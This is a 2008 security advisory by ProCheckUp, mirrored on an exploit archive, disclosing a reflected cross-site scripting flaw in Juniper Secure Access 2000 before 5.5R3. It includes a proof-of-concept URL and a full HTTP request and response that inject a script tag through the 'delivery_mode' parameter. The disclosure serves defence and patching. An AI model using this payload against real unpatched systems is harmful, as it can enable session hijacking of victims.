the internet's safety

ProCheckUp Security Advisory 2007.41

ProCheckUp Security Advisory 2007.41
Posted Feb 28, 2008
Authored by ProCheckUp, Richard Brain | Site procheckup.com

Juniper Networks Secure Access 2000 versions prior to 5.5R3 are vulnerable to a cross site scripting vulnerability. Full details provided.

tags | exploit, xss
systems | juniper
MD5 | 152ed43ef865a56f7d6d4d31c80eef6b

ProCheckUp Security Advisory 2007.41

Change Mirror Download
PR07-41: XSS on Juniper Networks Secure Access 2000

Vulnerability found: 6th December 2007

Vendor informed: 12th December 2007

Severity: Medium-high


Description:

Juniper Networks Secure Access 2000 is vulnerable to a vanilla XSS.

Vulnerable server-side script: '/dana-na/auth/rdremediate.cgi'

Unfiltered parameter: 'delivery_mode'


Successfully tested on: Juniper Networks Secure Access 2000 (SA-2000)
5.5R1 (build 11711)


Proof of concept:

https://target-domain.foo/dana-na/auth/rdremediate.cgi?delivery_mode=</APPLET><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>&action=tryaga

in&signinId=url_default


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a victim user who clicks on a link to a Juniper
Networks Secure Access site. Such code would run within the security
context of the target domain.

This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e.: admin
session IDs) to unauthorised third parties.

Fix:

Juniper Networks was aware of this issue which they addressed on version
5.5R3. However, we decided to release this advisory due to lack of
information regarding this vulnerability in the public domain.

References:

http://www.procheckup.com/Vulnerabilities.php
http://www.juniper.net/products_and_services/ssl_vpn_secure_access/secure_access_2000/


Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)


COMPLETE HTTP REQUEST:

GET
/dana-na/auth/rdremediate.cgi?delivery_mode=</APPLET><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>&action=tryagain&signinId=url_default
HTTP/1.1
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
Host: target-domain.foo
Accept: */*
[CRLF]
[CRLF]


PARTIAL HTTP RESPONSE:

<title></title>

[SNIP]

<APPLET id=NeoterisSetup > Unknown deliver mode
</APPLET><SCRIPT>alert('Can Cross Site Attack')</SCRIPT>
<PARAM NAME="Parameter0" VALUE="action=tryagain"></APPLET>


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close